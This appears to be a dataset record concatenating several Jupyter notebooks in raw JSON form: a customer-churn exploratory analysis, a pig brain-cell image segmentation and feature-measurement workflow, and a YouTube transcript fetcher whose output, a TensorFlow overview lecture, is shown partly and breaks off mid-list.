"g = sns.catplot(x=\"InternetService\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on InternetService');",
"_____no_output_____"
],
[
"g = sns.catplot(data=df,x=\"InternetService\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\nplt.subplots_adjust(top=0.9)\ng = g.fig.suptitle('Violin plot distribution of MonthlyCharges for InternetService');",
"_____no_output_____"
]
],
[
[
"For Fiber optic, the MonthlyCharges range is between `$`70 and `$`100",
"_____no_output_____"
],
[
"## PaymentMethod",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['PaymentMethod'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['PaymentMethod'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"df.groupby(['PaymentMethod'])['MonthlyCharges','TotalCharges'].agg(['median','mean']).round(0)",
"_____no_output_____"
]
],
[
[
"Those we paid using Electronic check has the highest tendency to churn at 45% eventhough the TotalCharges are not the highest<br>\nWe need to convert Electronic Check to other forms of payment. A one time rebate for conversion to entice them",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"PaymentMethod\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on PaymentMethod');",
"_____no_output_____"
],
[
"g = sns.catplot(data=df,x=\"PaymentMethod\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\nplt.subplots_adjust(top=0.9)\ng = g.fig.suptitle('Violin plot distribution of MonthlyCharges for InternetService');",
"_____no_output_____"
]
],
[
[
"## Contract",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"Contract\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on Contract');",
"_____no_output_____"
],
[
"pd.concat([\n df.groupby(['Contract'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['Contract'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
]
],
[
[
"The shortest/no contract will tend to encourage Churn",
"_____no_output_____"
],
[
"## PaperlessBilling",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"PaperlessBilling\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on PaperlessBilling');",
"_____no_output_____"
],
[
"pd.concat([\n df.groupby(['PaperlessBilling'])['Churn'].value_counts().round().to_frame(name='Churn Count'),\n df.groupby(['PaperlessBilling'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
]
],
[
[
"The Paperless Billing will tend to encourage Churn, twice of non-paperless <br>\nWith this information, we need to remind customers via email or SMS",
"_____no_output_____"
]
],
[
[
"## Additional subscriptions",
"_____no_output_____"
],
[
"sns.scatterplot(x='MonthlyCharges',y='TotalCharges',hue='Churn',data=df);",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"import pandas as pd\ndf = pd.read_csv('data/churn.csv')\ndf.head()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"df.PaperlessBilling.unique()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70727e68cb26ffb563e54d110542fad3dc70793 | 32,819 | ipynb | Jupyter Notebook | pig_analysis_segmentation.ipynb | Nance-Lab/cellmorphflows | 96d2debf037048ad6414153aada2993fb6300b46 | [
"MIT"
] | 1 | 2021-11-21T04:09:03.000Z | 2021-11-21T04:09:03.000Z | pig_analysis_segmentation.ipynb | Nance-Lab/cellmorphflows | 96d2debf037048ad6414153aada2993fb6300b46 | [
"MIT"
] | null | null | null | pig_analysis_segmentation.ipynb | Nance-Lab/cellmorphflows | 96d2debf037048ad6414153aada2993fb6300b46 | [
"MIT"
] | null | null | null | 35.985746 | 299 | 0.468448 | [
[
[
"# Purpose: Pig Cell Analysis",
"_____no_output_____"
],
[
"### Purpose: To segment and quantify features of all the pig data",
"_____no_output_____"
],
[
"Created by: Hawley Helmbrecht",
"_____no_output_____"
],
[
"Creation Date: 06/4/2021",
"_____no_output_____"
],
[
"Last Update: ",
"_____no_output_____"
],
[
"Notes:\n \n I did this process 3 times. First only using one of the channels. Second time, using a max intensity projection of all the channels since they appear to all be GFAP. And the third time with the max intensity projection and then with the binary fill holes after the remove small objects.\n \n I will do a qualitative check of segmentation accuracy to chose between these three for the VAMPIRE analysis and data visualization later. The current notebook shows the process for the 3rd option.",
"_____no_output_____"
],
[
"*Step 1: Import Necessary Packages*",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nfrom scipy import ndimage\n\nimport skimage.filters\nfrom skimage import morphology\nfrom skimage.measure import label, regionprops, regionprops_table\nfrom skimage.color import label2rgb\nfrom skimage import io\nfrom skimage import measure \n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport watermark\nimport os\nfrom PIL import Image",
"_____no_output_____"
]
],
[
[
"*Step 2: User Inputs*",
"_____no_output_____"
]
],
[
[
"#replace the example path from my computer with the path to the image on your computer\n\ncell_folder = '/Users/hhelmbre/Desktop/Hawley_Pig_Data'\n\nimage_type = '.tif'",
"_____no_output_____"
]
],
[
[
"*Step 3: Defining a Folder Cleaner Function to only Return Tif Images*",
"_____no_output_____"
]
],
[
[
"def folder_cleaner(folder, image_type):\n k=0\n for files in folder:\n if image_type in str(files):\n k+=1\n else:\n folder = np.delete(folder, np.argwhere(folder == str(files)))\n return folder",
"_____no_output_____"
]
],
[
[
"*Step 4: Get All Images in the Folder*",
"_____no_output_____"
]
],
[
[
"arr = os.listdir(cell_folder)\nfile_list = np.asarray(arr)\nfile_list = folder_cleaner(file_list, image_type)",
"_____no_output_____"
],
[
"file_list",
"_____no_output_____"
]
],
[
[
"*Step 5: Segmenting and Calculating Region Features on All Images*",
"_____no_output_____"
]
],
[
[
"properties_list = ('area', 'bbox_area', 'centroid', 'convex_area', \n 'eccentricity', 'equivalent_diameter', 'euler_number', \n 'extent', 'filled_area', 'major_axis_length', \n 'minor_axis_length', 'orientation', 'perimeter', 'solidity')\n",
"_____no_output_____"
],
[
"j = 0\nfor names in file_list:\n \n try:\n cell_im = io.imread(str(cell_folder + '/' + names))\n print('name', names, 'shape', cell_im.shape)\n shape = cell_im.shape\n \n #Some of the images did not have 3 channels but still appear to include only the GFAP stain\n if len(shape) == 3:\n green_cell_im = np.max(cell_im, axis=2)\n else:\n green_cell_im = cell_im\n \n thresh_li = skimage.filters.threshold_li(green_cell_im)\n binary_li = green_cell_im > thresh_li\n new_binary_li = morphology.remove_small_objects(binary_li, min_size=500)\n new_binary_li = ndimage.binary_fill_holes(new_binary_li)\n label_image = label(new_binary_li)\n \n #Saving the Segmented Image\n cell_im_name = str(cell_folder + '/' + names)\n size = len(cell_im_name)\n cell_im_mod = cell_im_name[:size - 4]\n im_to_save = Image.fromarray(new_binary_li)\n im_to_save.save(str(cell_im_mod + '_' + 'segmented.png'))\n \n #Feel free to add them here as well. The computational time is pretty efficient\n props = measure.regionprops_table(label_image, properties=(properties_list))\n\n if j == 0:\n df = pd.DataFrame(props)\n df['filename'] = names\n else:\n df2 = pd.DataFrame(props)\n df2['filename'] = names\n df = df.append(df2)\n \n except FileNotFoundError:\n continue\n\n j = 1",
"name 2347_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F3.tif shape (1456, 1936)\nname 2413_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2317_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2414_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F7.tif shape (1456, 1936)\nname 2312_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2313_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2412_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2413_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2316_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2306_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2312_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F1.tif shape (1456, 1936)\nname 2441_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2347_PC_20x_F8.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F2.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F6.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F3.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F7.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2206_PC_20x_F1.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2441_PC_20x_F4.tif shape (1456, 1936, 3)\nname 2205_PC_20x_F5.tif shape (1456, 1936, 3)\nname 2346_PC_20x_F4.tif shape (1456, 1936, 3)\n"
]
],
[
[
"*Step 6: Caculating the Circularity*",
"_____no_output_____"
]
],
[
[
"df['circularity'] = 4*np.pi*df.area/df.perimeter**2",
"_____no_output_____"
]
],
[
[
"*Step 7: Calculating the Aspect Ratio*",
"_____no_output_____"
]
],
[
[
"df['aspect_ratio'] = df.major_axis_length/df.minor_axis_length",
"_____no_output_____"
]
],
[
[
"*Step 8: Add in a column for the ID*",
"_____no_output_____"
]
],
[
[
"df['sample_id'] = df.filename.str[:4]",
"_____no_output_____"
]
],
[
[
"*Step 9: Add in a column for the image number*",
"_____no_output_____"
]
],
[
[
"df['image_id'] = df.filename.str[-6:]",
"_____no_output_____"
],
[
"df['image_id'] = df.image_id.str[:2]",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
]
],
[
[
"*Step 10: Saving as a CSV file*",
"_____no_output_____"
]
],
[
[
"df.to_csv('/Users/hhelmbre/Desktop/Hawley_Pig_Data/06_04_2021_allim_features_maxint_fill2.csv')",
"_____no_output_____"
]
],
[
[
"*Step 11: Print Dependencies and State*",
"_____no_output_____"
]
],
[
[
"%load_ext watermark\n\n%watermark -v -m -p numpy,pandas,scipy,skimage,matplotlib,wget\n\n%watermark -u -n -t -z",
"The watermark extension is already loaded. To reload it, use:\n %reload_ext watermark\nPython implementation: CPython\nPython version : 3.7.4\nIPython version : 7.8.0\n\nnumpy : 1.17.2\npandas : 0.25.1\nscipy : 1.3.1\nskimage : 0.17.2\nmatplotlib: 3.1.1\nwget : not installed\n\nCompiler : Clang 4.0.1 (tags/RELEASE_401/final)\nOS : Darwin\nRelease : 20.3.0\nMachine : x86_64\nProcessor : i386\nCPU cores : 8\nArchitecture: 64bit\n\nLast updated: Fri Jun 04 2021 10:17:05MST\n\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e707282918b26347fcc866ad779f1d96da4def7b | 96,491 | ipynb | Jupyter Notebook | 1) YouTube_Preprocessing.ipynb | somanyadav/Youtube-Summariser | b985662ee3e2c3d2920b3b9d15b50e359d7fc05e | [
"MIT"
] | null | null | null | 1) YouTube_Preprocessing.ipynb | somanyadav/Youtube-Summariser | b985662ee3e2c3d2920b3b9d15b50e359d7fc05e | [
"MIT"
] | null | null | null | 1) YouTube_Preprocessing.ipynb | somanyadav/Youtube-Summariser | b985662ee3e2c3d2920b3b9d15b50e359d7fc05e | [
"MIT"
] | null | null | null | 108.78354 | 33,438 | 0.712388 | [
[
[
"!pip install youtube_transcript_api",
"Requirement already satisfied: youtube_transcript_api in /usr/local/lib/python3.7/dist-packages (0.4.3)\nRequirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from youtube_transcript_api) (2.23.0)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (2.10)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests->youtube_transcript_api) (2021.10.8)\n"
],
[
"from youtube_transcript_api import YouTubeTranscriptApi",
"_____no_output_____"
],
[
"from IPython.display import YouTubeVideo",
"_____no_output_____"
],
[
"video=input(\"Enter the link of your YouTube Video: \")",
"Enter the link of your YouTube Video: https://www.youtube.com/watch?v=tXVNS-V39A0\n"
],
[
"id_video=video.split(\"=\")[1]\nprint(id_video)",
"tXVNS-V39A0\n"
],
[
"YouTubeVideo(id_video)",
"_____no_output_____"
],
[
"transcript = YouTubeTranscriptApi.get_transcript(id_video)",
"_____no_output_____"
],
[
"transcript",
"_____no_output_____"
],
[
"doc = \"\"\nfor line in transcript:\n doc =doc+ ' ' + line['text']\nprint(type(doc))\nprint(doc)\n#print(len(result))",
"<class 'str'>\n Machine learning is\na complex discipline but implementing machine\nlearning models is far less daunting and difficult than it used to be. Thanks to machine learning Frameworks\nsuch as Google's TensorFlow that ease the process of acquiring data, training model,\nsolving predictions and refining future\nresults. Created by the Google brain team tensorflow\nis an open source library for numerical computation and large scale machine learning.\nTensorflow bundles together a study of machine learning and deep learning models and algorithms and make\nthem useful by way of common metaphor who will use machine learning\nand all of its products to improve the search engine\nthe translation image captioning or the recommendations to give\nyou a concrete example, Google users can experience\na faster and more refined search with artificial intelligence. If the user types a keyword\nin the search bar Google provides a recommendation about\nwhat could be the next world not as a flow is being used\nby a lot of Companies in the industries and\nto name a few first let's start with Airbnb, the leading Global\nOnline Marketplace and Hospitality service. The Airbnb ingenious\nand data science team applies machine learning using tensorflow to\nclassify the images and detect objects at scale helping to improve\nthe guest experience and we talked about the healthcare industry\nusing tensorflow GE Healthcare is training a neural network\nto identify specific anatomic during the brain MRI exam\nto help improve speed and reliability now PayPal\nis using it as a flow to stay at The Cutting Edge of fraud detection using tensorflow deep\ntrance for Learning and Generator modeling PayPal has been able to recognize complex fraud patterns to\nincrease fraud decline accuracy while improving the experience\nof legitimate users through increased Precision\nin identification. China mobile is using tensorflow\nto improve their success rate of the network element\ncut overs Channel while has created\na deep Fist amusing tensorflow that can automatically predicts\nthe cut over time window verify log operations and detect Network anomalies and this has already\nsuccessfully supported the world's largest relocation\nof hundreds of millions iot HSS. Let's talk about\nthe tensorflow feature. What makes it stand out\nfrom the other competition. So Tessa flow offers\nmultiple level of abstractions, so you can choose\nthe right one for your needs. You can build and train models by using\nthe high-level Kira's API, which makes getting started with tensorflow and machine\nlearning very very easy. If you need more flexibility\nIker execution allows for immediate iteration\nand intuitive debugging when you enable eager execution, you will be executing\ntensorflow kernels immediately rather than constructing graphs that will be executed\nlater know it provides a direct path to protection whether it's on servos\nthe S devices or the web tensorflow lets\nyou train and deploy your model. Really no matter what language or the platform you\nare using you can build and train the state-of-the-art\nmodels without sacrificing speed or performance. That's the flow gives\nyou the flexibility and the control with features\nlike Kira's functional API and model subclassing\nAPA for creation of complex topologies. There's a flow also\nsupports an ecosystem of powerful add on libraries and models to experiment\nwith the tisza flows name directly derived from\nits core framework. It does a flow all\nthe computation involves tensor. So a tensor is a vector\nor a matrix of n Dimensions that represents the type all\nthe operations are conducted inside a graph and the graph\nis set of a computation that takes place successively. Each operation is\ncalled an open note and are connected to each other. There's a flow allows\nthe developers to create a data flow graphs\nwhich are structures that describe how the data move\nthrough a graph or a series of processing nodes. Each node in the graph represents a mathematical\noperation and each connection or Edge between the notes is\na multi-dimensional data array or tensile test flow\nprovides all of this for the programmer by way of the Python language\nby then is easy to learn and work with and provides\nconvenient ways to express how high-level abstraction\ncan be coupled together notes and the tensor in the tensorflow\nour python objects. And there's a flow\napplications are themselves quite an application. Now the actual math operations\nhowever are not performed in Python the libraries of transformation data available\nthrough tears flow are written as high performance C++ binaries\npython just directs the traffic between the pieces and provides high level\nprogramming attraction to hook them together now\nbuilding a new rail. It works cannot get\nany more simpler. Usually any machine learning or deep learning process\nhas some similar steps, but in this case of terms\nof flow it is so simple any typical machine learning\nlife Lord any process has some of the steps like collection of data set than building\nthe model training the network evaluating the model and then predicting the outcome\nin case of tensorflow. Most of the time is occupied\nin the collection of data set now building a model\nrequires only a few lines of code training. The network is just a single\nline evaluating the network or the model itself is a single\nline of code and predicting. The model is also a single line\nof code now training a neural network cannot get\nany more easier than this and that is why it is\nthe flow remains at the top when compared to\nthe other competitors. Now, that's a for competes with a slew of other machine\nlearning Frameworks like python or C. NT K and M. And next these are\nthe three major Frameworks that address many\nof the same needs now pie torch in addition\nto being built in Python and as many other similarities to tensorflow the hardware\naccelerated components under the hood a highly\ninteractive development model that allows for Designing as you go work and many useful\ncomponents are already included. Now PyTorch is\ngenerally a better choice for fast development of projects that need to be up\nand running in a short time but tensorflow wins out\nfor larger projects and more complex workflows CNTK the Microsoft\ncognitive toolkit, like tensorflow uses\na graph structure to describe the data flow, but it focuses more on creating deep learning\nneural network siente que handles many neural network jobs\nfaster and has a broader set of apis for python C++ C sharp and Java but C NT K\nisn't currently as easy to learn or deployed as tensorflow. No talking about Apache MXNet adopted by Amazon as a premier\ndeep learning framework on AWS can scale almost linearly across multiple gpus\nand multiple machine. It also supports a broad range of languages API\nlike python C++. scala R JavaScript\nJulia and go although its native a parent\nas pleasant to work with as tensorflow. It is also in the\nmarket another thing that gives tensorflow Edge over\nother competitors is the fact that it is open source and has\na huge Community Support that not only provides\nresearchers a way to build new models, but also a platform\nto interact with others that face some issues if we talk about a simple\nprogram in terms of flow. So any program basically\nconsists of a construction phase and then an execution phase\nthe construction phase where you build a graph\nand execution phase is where you need\nto evaluate the graph and then create a session then\ninitialize all the variables. So as you can see\nhere in the example of geometric sequencing it\nis so easy to execute and if this is also hard for you, there's a float\n2.0 the latest release makes this even easier to code it\nhas eager execution by default which makes things so\nmuch simpler and easier. So as you can see\nwith either X You should our program has a strong\nto a few lines of code. So guys, that's it\nfor the session. I hope you got to know\ntensorflow what exactly it is and how useful it is go ahead and create your own deep learning models\nand see for yourself. What an incredible framework\nthis is till then thank you and happy learning. I hope you have enjoyed\nlistening to this video. Please be kind enough to like it and you can comment any\nof your doubts and queries and we will reply them at the earliest do look out\nfor more videos in our playlist And subscribe to Edureka channel to learn more. Happy learning.\n"
],
[
"doc=[]\nfor line in transcript:\n if \"\\n\" in line['text']:\n x=line['text'].replace(\"\\n\",\" \")\n doc.append(x)\n else:\n doc.append(line['text'])\nprint(doc)",
"['Machine learning is a complex discipline', 'but implementing machine learning models is far', 'less daunting and difficult', 'than it used to be. Thanks', \"to machine learning Frameworks such as Google's TensorFlow\", 'that ease the process', 'of acquiring data, training model, solving predictions', 'and refining future results. Created by', 'the Google brain team tensorflow is an open source library', 'for numerical computation', 'and large scale machine learning. Tensorflow bundles together', 'a study of machine learning', 'and deep learning models', 'and algorithms and make them useful by way', 'of common metaphor', 'who will use machine learning and all of its products', 'to improve the search engine the translation image captioning', 'or the recommendations to give you a concrete example,', 'Google users can experience a faster and more refined search', 'with artificial intelligence.', 'If the user types a keyword in the search bar Google', 'provides a recommendation about what could be the next world not', 'as a flow is being used by a lot of Companies', 'in the industries and to name a few first', \"let's start with Airbnb,\", 'the leading Global Online Marketplace', 'and Hospitality service.', 'The Airbnb ingenious and data science team', 'applies machine learning', 'using tensorflow to classify the images', 'and detect objects', 'at scale helping to improve the guest experience', 'and we talked', 'about the healthcare industry using tensorflow GE Healthcare', 'is training a neural network to identify specific anatomic', 'during the brain MRI exam to help improve speed', 'and reliability now PayPal is using it as a flow to stay', 'at The Cutting Edge', 'of fraud detection', 'using tensorflow deep trance for Learning', 'and Generator modeling PayPal', 'has been able to recognize', 'complex fraud patterns to increase fraud decline accuracy', 'while improving the experience of legitimate users', 'through increased Precision in identification.', 'China mobile is using tensorflow to improve their success rate', 'of the network element cut overs Channel', 'while has created a deep Fist amusing tensorflow', 'that can automatically predicts the cut over time window', 'verify log operations', 'and detect Network anomalies', 'and this has already successfully supported', \"the world's largest relocation of hundreds of millions iot HSS.\", \"Let's talk about the tensorflow feature.\", 'What makes it stand out from the other competition.', 'So Tessa flow offers multiple level of abstractions,', 'so you can choose the right one for your needs.', 'You can build', \"and train models by using the high-level Kira's API,\", 'which makes getting started', 'with tensorflow and machine learning very very easy.', 'If you need more flexibility Iker execution allows', 'for immediate iteration and intuitive debugging', 'when you enable eager execution,', 'you will be executing tensorflow kernels immediately', 'rather than constructing graphs', 'that will be executed later know it provides', 'a direct path to protection', \"whether it's on servos the S devices\", 'or the web tensorflow lets you train and deploy your model.', 'Really no matter what language', 'or the platform you are using you can build', 'and train the state-of-the-art models without sacrificing', 'speed or performance.', \"That's the flow gives you the flexibility\", \"and the control with features like Kira's functional API\", 'and model subclassing APA for creation', 'of complex topologies.', \"There's a flow also supports an ecosystem\", 'of powerful add on libraries', 'and models to experiment with the tisza flows name', 'directly derived from its core framework.', 'It does a flow all the computation involves tensor.', 'So a tensor is a vector or a matrix of n Dimensions', 'that represents the type all the operations are conducted', 'inside a graph and the graph is set of a computation', 'that takes place successively.', 'Each operation is called an open note', 'and are connected to each other.', \"There's a flow allows the developers to create\", 'a data flow graphs which are structures', 'that describe how the data move through a graph or a series', 'of processing nodes.', 'Each node in the graph', 'represents a mathematical operation and each connection', 'or Edge between the notes is a multi-dimensional data array', 'or tensile test flow provides all of this', 'for the programmer by way', 'of the Python language by then is easy to learn', 'and work with and provides convenient ways to express', 'how high-level abstraction can be coupled together notes', 'and the tensor in the tensorflow our python objects.', \"And there's a flow applications are themselves\", 'quite an application.', 'Now the actual math operations however are not performed', 'in Python the libraries', 'of transformation data available through tears flow are written', 'as high performance C++ binaries python just directs the traffic', 'between the pieces', 'and provides high level programming attraction to hook', 'them together now building a new rail.', 'It works cannot get any more simpler.', 'Usually any machine learning', 'or deep learning process has some similar steps,', 'but in this case of terms of flow it is so simple', 'any typical machine learning life Lord any process has some', 'of the steps like collection', 'of data set than building the model training the network', 'evaluating the model', 'and then predicting the outcome in case of tensorflow.', 'Most of the time is occupied in the collection', 'of data set now building a model requires only a few lines', 'of code training.', 'The network is just a single line evaluating the network', 'or the model itself is a single line of code and predicting.', 'The model is also a single line of code now training', 'a neural network cannot get any more easier than this', 'and that is why it is the flow remains at the top', 'when compared to the other competitors.', \"Now, that's a for competes\", 'with a slew of other machine learning Frameworks like python', 'or C. NT K and M.', 'And next these are the three major Frameworks', 'that address many of the same needs now', 'pie torch in addition to being built in Python', 'and as many other similarities', 'to tensorflow the hardware accelerated components', 'under the hood a highly interactive development model', 'that allows for Designing', 'as you go work and many useful components are already included.', 'Now PyTorch is generally a better choice', 'for fast development of projects', 'that need to be up and running in a short time', 'but tensorflow wins out for larger projects', 'and more complex workflows', 'CNTK the Microsoft cognitive toolkit,', 'like tensorflow uses a graph structure', 'to describe the data flow,', 'but it focuses more', 'on creating deep learning neural network siente que', 'handles many neural network jobs faster and has a broader set', 'of apis for python C++ C sharp', \"and Java but C NT K isn't currently as easy to learn\", 'or deployed as tensorflow.', 'No talking about Apache MXNet', 'adopted by Amazon as a premier deep learning framework', 'on AWS can scale almost linearly', 'across multiple gpus and multiple machine.', 